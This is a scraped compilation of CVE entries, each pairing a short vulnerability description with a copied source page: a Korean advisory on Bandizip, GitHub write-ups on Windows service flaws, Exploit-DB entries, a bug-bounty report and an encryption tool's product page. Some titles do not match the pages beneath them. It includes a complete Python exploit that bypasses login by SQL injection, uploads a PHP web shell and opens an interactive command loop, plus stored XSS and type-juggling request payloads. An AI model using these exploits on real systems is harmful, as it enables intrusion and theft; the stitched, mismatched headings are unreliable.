CVE-2022-28378: cms/CHANGELOG.md at develop · craftcms/cms

A remote code execution vulnerability due to incomplete check for 'xheader_decode_path_record' function's parameter length value in the ark library. Remote attackers can induce exploit malicious code using this function.

**Security Advisory**

 

CVE-2021-26623 | Bandisoft ARK Library Out-of-bound Vulnerability2022.03.31

□ Overview  
 o Bandisoft International Inc. released security update to address remote code execution vulnerability in Bandizip.

Vulnerability

Vulnerability Type

Impact

Severity

CVSS Score

CVE ID

Out-of-Bounds Read/Write

Remote code execution

High

7.8

CVE-2021-26623

  
□ Description  
 o A remote code execution vulnerability due to incomplete check for 'xheader\_decode\_path\_record' function's parameter length value in the ark library.  
 o Remote attackers can induce exploit malicious code using this function.

□ Affected Product

Affected Product

Product

Version

Platform

Bandizip

prior of 7.19

Windows

  
□ Solution  
 o Update software over Bandizip 7.20 version or higher.

□ Reference  
 \[1\] https://kr.bandisoft.com/bandizip/

□ Etc  
 o Thanks to Jeong JaeYoung for reporting this vulnerability.

□ 작성 : 침해사고분석단 취약점분석팀

트위터 페이스북

CVE-2021-26623: KISA 인터넷 보호나라&KrCERT

BitComet Service for Windows before version 1.8.6 contains an unquoted service path vulnerability which allows attackers to escalate privileges to the system level.

main

Switch branches/tags

Vuln/**BitComet-Unquoted-Service-Path**/

Go to file

Vuln/**BitComet-Unquoted-Service-Path**/

**Latest commit**

![@ycdxsb](https://avatars.githubusercontent.com/u/32149596?s=48&v=4)

ycdxsb update BitComet Unquoted Service Path Vuln Info

0d34b7d

Mar 10, 2022

update BitComet Unquoted Service Path Vuln Info

`0d34b7d`

**Git stats**

*   **History**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

. .

pic

add BitComet Unquoted Service Path Vuln Info

Mar 9, 2022

BitCometService Unquoted Service Path.md

update BitComet Unquoted Service Path Vuln Info

Mar 10, 2022

poc.mp4

add BitComet Unquoted Service Path Vuln Info

Mar 9, 2022

CVE-2022-27050: Vuln/BitComet-Unquoted-Service-Path at main · ycdxsb/Vuln

Raidrive before v2021.12.35 allows attackers to arbitrarily move log files by pre-creating a mountpoint and log files before Raidrive is installed.

**Raidrive Service Arbitrary File Move****Basic Info**

Vuln Version：Version 2021-10-9 and before

Fixed Version：Version 2021.12.35

Test OS Version：Win10 20H2(OS build 19042.1348)

Vulnerability Type：Arbitrary File Move, Local Privilege Escalation.

**Vuln Analyse**

The Raidrive Service which is installed by the administrator will create log files named like `C:\ProgramData\OpenBoxLab\Radrive\log\service.log.*` as SYSTEM.

![info1](https://github.com/ycdxsb/Vuln/raw/main/RaiDrive-Arbitrary-File-Move/pic/info.png)

It will check log files under `C:\ProgramData\OpenBoxLab\Radrive\log` and move all of it before it creates a new log file. For example, if there is a log file named service.log.1, it will move it to service.log.2.

The problem is that all users can make folders and create files under `C:\ProgramData` in windows. Because of file operation abuse, we can precreate mountpoint `C:\ProgramData\OpenBoxLab\Raidrive\log` and create log files before raidrive is installed.

**Proof of Concept**

To exploit this vuln, an attacker needs to pre-create mountpoint before administrators install raidrive, and trigger arbitrary file move when administrators install raidrive and start raidrive service.

Poc Video

**Official Confirm**

![confirm](https://github.com/ycdxsb/Vuln/raw/main/RaiDrive-Arbitrary-File-Move/pic/confirm.jpg)

CVE-2022-27049: Vuln/Raidrive Setup Arbitrary File Move.md at main · ycdxsb/Vuln

The WinSEGAV AutoConfig service in EG Free Antivirus v2020 suffers from a local privilege escalation vulnerability, due to unquoted paths in the service's executable path.

![](http://www.egsoftweb.in/img/egfooterlogo.png)

Free Security software for windows, library & application software, blogs, tutorials, snippets & miscellaneous tricks on programming. Learn, Share and build your own app... Read more

**Follow Us**

*   
*   
*   
*   

**Contact Us on Email**

                       

Send Email

CVE-2021-46439: EGSoftWeb.in

A Remote Code Execution (RCE) vulnerability exists in Simple Client Management System 1.0 in create.php due to the failure to validate the extension of the file being sent in a request.

**Simple Client Management System 1.0 - Remote Code Execution (RCE)**

**Platform:****PHP**

**Date:****2021-07-05**

  

    # Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
    # Date: July 4, 2021
    # Exploit Author: Ishan Saha
    # Vendor Homepage: https://www.sourcecodester.com/
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
    # Version: 1.0
    # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali
    
    #!/usr/bin/python
    
    # Description:
    
    # 1. This uses the SQL injection to bypass the admin login and create a new user
    # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
    # 3. the shell is called from the location 
    
    import requests 
    from colorama import Fore, Back, Style
    '''
    Description:
    Using the sql injeciton to bypass the login and create a user. 
    This user creates a client with the shell as an image and uploads the shell.
    The shell is called by the requests library for easier use.
    ------------------------------------------
    Developed by - Ishan Saha & HackerCTF team  (https://twitter.com/hackerctf)
    ------------------------------------------
    '''
    # Variables : change the URL according to need
    URL="http://192.168.0.248/client/"
    shellcode = "<?php system($_GET['cmd']);?>"
    filename = "shell.php"
    authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
    createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
    userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
    shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
    def format_text(title,item):
      cr = '\r\n'
      section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
      item=str(item)
      text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
      return text
    
    
    ShellSession = requests.Session()
    response = ShellSession.get(URL)
    response = ShellSession.post(URL + "admin/index.php",data=authdata)
    response = ShellSession.post(URL + "admin/regester.php",data=createuser)
    response = ShellSession.post(URL,data=userlogin)
    response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
    location = URL +"img/" + filename
    #print statements
    print(format_text("Target",URL),end='')
    print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
    print(format_text("shell location",location),end='')
    print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))
    
    while True:
        cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
        if cmd == 'exit':
            break
        print(ShellSession.get(location + "?cmd="+cmd).content.decode())

CVE-2021-43484: Offensive Security’s Exploit Database Archive

Multiple Cross Site Scripting (XSS) vulnerabilities exist in Ssourcecodester Simple Client Management System v1 via (1) Add new Client and (2) Add new invoice.

\# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Sentinal920 # Date: 5-11-2021 (5th Nov 2021) # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: client,invoice # Vulnerable Parameters: "lastname", "remarks" Technical description: A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/cms/admin/?page=client 2) Click on add new client 3) Insert your payload in the "lastname" parameter or the "description" parameter 4) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - 1) XSS POC in Add New Client POST /cms/classes/Master.php?f=save\_client HTTP/1.1 Host: localhost Content-Length: 1026 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=client/manage\_client Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="lastname" ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="firstname" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="middlename" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="dob" 2021-11-03 ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="contact" xxxxxxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="address" xxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="email" xxxx@xxx.com ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- 2) XSS POC in Add New Invoice POST /cms/classes/Master.php?f=save\_invoice HTTP/1.1 Host: localhost Content-Length: 1032 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=invoice/manage\_invoice Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="id" ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="client\_id" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="service\_id\[\]" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="price\[\]" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount\_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax\_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="total\_amount" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="remarks" ------WebKitFormBoundaryEk0iOWhhoA0lApXo--

CVE-2021-43505

Loose comparison causes IDOR on multiple endpoints in GitHub repository livehelperchat/livehelperchat prior to 3.96.

**Description**

Live Helper Chat is vulnerable to Type Juggling on the `requestPayload['hash']`. The application uses a Loose Comparison to check if the user-controlled parameter is equal to an hash, this check is vulnerable because it's possible to pass other Data Types via JSON that causes the `if` condition to be `True`. This occurs on multiple endpoints.

**Proof of Concept**

For the PoC, the vulnerability resides on https://github.com/LiveHelperChat/livehelperchat/blob/master/lhc\_web/modules/lhwidgetrestapi/fetchmessage.php#L19

        if ($chat instanceof erLhcoreClassModelChat && $chat->hash == $requestPayload['hash'])
    

1.  **Request**

    POST /eng/widgetrestapi/fetchmessages HTTP/1.1
    Host: demo.livehelperchat.com
    Cookie: lhc_vid=eb9bc0c044919538c5b1
    Content-Length: 62
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="99"
    Accept: application/json, text/plain, */*
    Content-Type: application/x-www-form-urlencoded
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
    Sec-Ch-Ua-Platform: "macOS"
    Origin: https://demo.livehelperchat.com
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.livehelperchat.com/
    Accept-Encoding: gzip, deflate
    Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    
    {"chat_id":2,"hash":true,"lmgsid":1,"theme":1,"new_chat":true}
    

Note the `"hash":true`, this will make the `if` always return `True`.

The loose comparison can be solved by using a type safe check `===` or updating PHP to `8 <=`.

I've attached more occurrences of the same vulnerability: modules/lhwidgetrestapi/fetchmessage.php modules/lhwidgetrestapi/fetchmessages.php modules/lhwidgetrestapi/getmessagesnippet.php modules/lhwidgetrestapi/initchat.php modules/lhwidgetrestapi/uisettings.php

**Impact**

It's possible to bypass multiple checks. An attacker could access private information of other users.

**Occurrences**

CVE-2022-1176: Loose comparison causes IDOR on multiple endpoints in livehelperchat

Untrusted search path vulnerability in AttacheCase ver.3.6.1.0 and earlier allows an attacker to gain privileges and execute arbitrary code via a Trojan horse DLL in an unspecified directory.

![AttachéCase icon](https://hibara.org/software/attachecase/img/main_icon_128x128.png)

**AttachéCase ( Current Version )****Windows10, 11 / macOS**

![Windows 10 logo](https://hibara.org/software/attachecase/img/Windows_10_Logo.svg) **\- Update**   \* NET Framework 4.6 later

![Apple logo](https://hibara.org/software/attachecase/img/apple-logo.svg) **\-**   \* macOS 10.14 (macOS Mojave) later

> "AttachéCase4" is a powerful file/folder encryption software that uses the world's standard encryption algorithm, while focusing on simplicity and ease of use for daily use.

> **Important Notice（2022/03/30）**
> 
> A vulnerability in loading DLL was discovered in "AttacheCase4" for Windows. Placing a maliciously modified "dwmapi.dll" in the directory containing the executable file (AttacheCase.exe) may allow arbitrary code to be executed.
> 
> This vulnerability have been confirmed in **ver. 4.0.2.7 or earlier**. If you are using these versions of "AttacheCase4", please update to the latest version as soon as possible.
> 
> More information on this vulnerability can be found at the following page.  
> https://hibara.org/software/attachecase/vulnerability/
> 
> JVN#10140834  
> **AttacheCase may insecurely load Dynamic Link Libraries**  
> https://jvn.jp/jp/JVN10140834/
> 
> By countermeasuring of this vulnerability, the previous vulnerability in the older version of the " AttacheCase#3 " is also fixed.
> 
> If you are using this version, please update to the latest version as soon as possible.

![Main Window](https://hibara.org/software/attachecase/img/main_window_en.png)

スポンサー・リンク

**Introduction**

**Encryption is just three steps**

Encryption is just three steps. You can easily encrypt files by simply dragging and dropping them, or if you drag and drop the entire folder, it will create one encrypted file (pack the entire folder).

![ファイルの暗号化はわずか３ステップ](https://hibara.org/software/attachecase/img/3-steps-horizontal_en.png)

In addition, the data will be compressed during the encryption process, making it compact in size.

Decrypting is also as easy as dragging and dropping, or double-clicking and entering the password to restore the original files and folders.

**Output in self-executable format**

The encrypted file can also be output as an executable (\*.exe) file, so it can be passed to someone who does not have an AttachéCase and can be decrypted.

![Output in self-executable format](https://hibara.org/software/attachecase/img/exeout_en.png)

The Mac version cannot output in self-executable format, but it can decrypt executable files (\*.exe) generated by the Windows version.

**Supports both Windows and macOS**

Enables data exchange on Windows and macOS.

![AttcheCase for Mac](https://hibara.org/software/attachecase/img/attachecase_mac.png)

At present, the macOS version is inferior to the Windows version in terms of functionality, but as described in the roadmap below, I plan to start supporting both versions in earnest from around .NET6.

**Public key cryptography**

From ver.4, public key cryptography (RSA) is also supported. By exchanging public and private keys, it is no longer necessary to exchange ZIP passwords, making it possible to exchange data more securely.

![Sending the public key](https://hibara.org/software/attachecase/img/public_key_en.png)

![Decrypting with a private key](https://hibara.org/software/attachecase/img/private_key_en.png)

![RSA Cryption](https://hibara.org/software/attachecase/img/rsa_crypt_en.png)

**Cryptographic algorithms are global standards**

The encryption algorithm is based on the Advanced Encryption Standard (AES), the next-generation encryption standard chosen by the U.S. Government's National Institute of Standards and Technology (NIST) in October 2000. Also, the encryption mode used is CBC mode.

![CBC暗号化モード](https://hibara.org/software/attachecase/img/cbc-mode_en.png)

**Key derivation according to RFC2898**

![Key derivation according to RFC2898](https://hibara.org/software/attachecase/img/rfc2898derive_bytes_en.png)

Based on "PKCS #5: Password-Based Cryptography Specification Version 2.0" by RFC2898, the derived key and initialization vector after 1,000 iterations of password-based key derivation mixed with random numbers as salt are output one after another, and each is used as the key and initialization vector for encryption.

**New data format (Current version)**

Starting from ver.4, a new data format has been introduced, which enables more efficient encryption and decryption based on the know-how accumulated in the development up to ver.3. Note that ver.4 can decrypt data of ver.3 and 2, but ver.3 and 2 cannot decrypt data of ver.4. For details on data formats, please refer to " here ".

The old version is below.

**Development Roadmap**

A macOS version is also available, but it has limited functionality compared to the Windows version. .NET library used in application will be upgraded in the future, making it a cross-platform application completely that supports both Windows and macOS. Specifically, I will do this over the period from Nov 2021 onward.

Due to the delay in development by Microsoft, it is likely that full cross-platform with Windows and macOS will not be available until the second quarter of 2022 or later . Depending on the development status, it may be possible to release it as a beta version before the end of this year, but the schedule is uncertain.

![Development Roadmap](https://hibara.org/software/attachecase/img/roadmap_en.png)

After that, we will support .NET7, .NET8 according to the latest libraries released by Microsoft.

**Starting from ver.4, commercial use will be charged.**

**Windows**

I also set the "trial period" as one month, but there is no limit to how long you can continue using the app.

The price is **550 yen (tax included) per 1 user**.

Note that

*   For home and personal use
*   Students and educational institutions

can use it free of charge as a free license version.

You have free personal use, but if you would like to support us in the form of "support" or "donation", you are welcome to pay so. In that case, you will be issued a registration code, just like a commercial user.

As a result, support for the previous ver. 3 and 2 will be discontinued (Complete termination by April 2022). However, the previous versions will continue to be available free of charge for both personal and commercial use.

**macOS**

As for the macOS version, anyone (regardless of personal or commercial use) can use it free of charge.

However, that is only for downloads from this website, and any future downloads handled by the App Store will be paid for (whether for personal or commercial use).

The reason why downloads from this website, including the macOS version, are free of charge, while downloads from the App Store are paid for, is explained in the next section.

**Why commercial use is now paid for?**

There are many reasons for this, including the cost of managing and maintaining websites, the cost of continuing software development, especially the cost of "code signing certificates" that are added to executable files to prove that they are safe on Windows and can be installed without warning messages, and, for macOS, the Apple Developer registration fee etc. has become very difficult to cover with the decrease in advertising revenue.

I get a lot of emails about bugs and complaints, but other than that, I don't know what kind of people are using it, and to be honest, I'm loss of motivation.

The source code is released under the GPLv3 license (the macOS version is not open to the public), so there are no restrictions on using it as a stray build. You will only be charged for downloading the software from this official website or the App Store (\* Currently under review). In other words, please think of it as the cost of the distributed product, including development and maintenance costs, code signing certificate fees, etc.

スポンサー・リンク

**Download**

**Ver.4**

![Windows10 logo](https://hibara.org/software/attachecase/img/Windows_10_Logo.svg)

\* Windows10, 11 / NET Framework 4.6 later

![Apple logo](https://hibara.org/software/attachecase/img/apple-logo.svg)

\* macOS 10.14 (macOS Mojave) later

![App Store button](https://hibara.org/software/attachecase/img/Download_on_the_Mac_App_Store_Badge_US-UK_RGB_blk_092917.svg)

**Hash value**

*   
*   
*   

MD5:  
SHA-1:  
SHA-256:  

MD5:  
SHA-1:  
SHA-256:  

MD5:  
SHA-1:  
SHA-256:  

**Update history for Windows version**

**Update history for macOS version**

**Old Ver.3**

> **Important Notice（2022/03/30）**
> 
> A previously reported vulnerability allows "AttacheCase#3" to be DLL hijacked (DLL preloaded) by placing certain DLL files in the location where the output self-extracting archive file and the main body "AttacheCase.exe" are located.
> 
> Please update to the latest version "AttacheCase#3" as soon as possible.
> 
> JVN#61502349  
> **Self-Extracting Encrypted Files created by AttacheCase may insecurely load Dynamic Link Libraries**  
> https://jvn.jp/en/jp/JVN61502349/  

![Windows10 logo](https://hibara.org/software/attachecase/img/Windows_10_Logo.svg)

\* Windows XP/Vista/7/8/10 / NET Framework 4.0 later

*   Although support for this software has been discontinued by Microsoft, it also will work on Windows XP.
*   .NET Framework 4 or higher is required for operation.

**Hash value**

*   
*   

**Update history**

**Old Ver.2**

![WindowsXP logo](https://hibara.org/software/attachecase/img/windows_xp.svg)

\* Windows 95, 98, XP

**Hash value**

*   
*   

**Open source license**

**GPLv3 license**

> Copyright (C) 2020 M.Hibara
> 
> This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
> 
> This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
> 
> You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.

**Source code**

**hibara - GitHub**

It has been built and tested with Microsoft Visual Studio 2019. It includes everything you need to build, including resource files. You are welcome to report bugs and requests to Issue, pull requests, forks, etc.

The MacOS version is not open source due to Apple's terms and conditions. However, the classes required for encryption and decryption (specifically, Encrypt4.cs and Decrypt4.cs) are the same.

![GitHubロゴ](https://hibara.org/software/attachecase/img/github-octcat.png)

**Data specification**

Starting from ver.4, the cryptographic algorithm has been changed to AES 256bit CBC mode for ease of porting. I keep that .NET is moving in the direction of cutting off Rijindael 256 support for in the future in mind.

In addition, I used to use SHA-1 for checksums, which is a heavy load. MD5 is now sufficient for this purpose.

The file information stored in the data is now stored serially as binary data instead of character strings. For details, please see the following PDF file.

Download data specification

To learn more about the data structure, including previous versions (ver.3 and 2), please download the PDF data above and check it out.

**オンラインヘルプ**

**Support**

For inquiries (support), please contact us by e-mail. Please contact us at the following address

> Mitsuhiro Hibara

If you would like to report a problem, please specify your OS version (Windows, macOS, and its version), the version of the AttachéCase you are using, and describe a situation that I can reproduce. If I can't reproduce the problem, I can't fix it.

If possible, please attach reproducible files and passwords (dummy data and dummy passwords are fine) so that I can make revisions smoothly.

> **Improvements, bug reports, and pull requests from GitHub are most welcome!**
> 
> If possible, please use the GitHub repository instead of your email address, and send improvements and bug reports to Issues , or Pull Requests if you can fix the code directly.

CVE-2022-28128: File encryption software for both Windows and macOS

Opps, this post exists, but was actually published 4/5/2022. We’re navigating you to the correct page now. If that doesn’t work click the link below: Randomizing the KUSER_SHARED_DATA Structure on Windows – Microsoft Security Response Center

Tag

#windows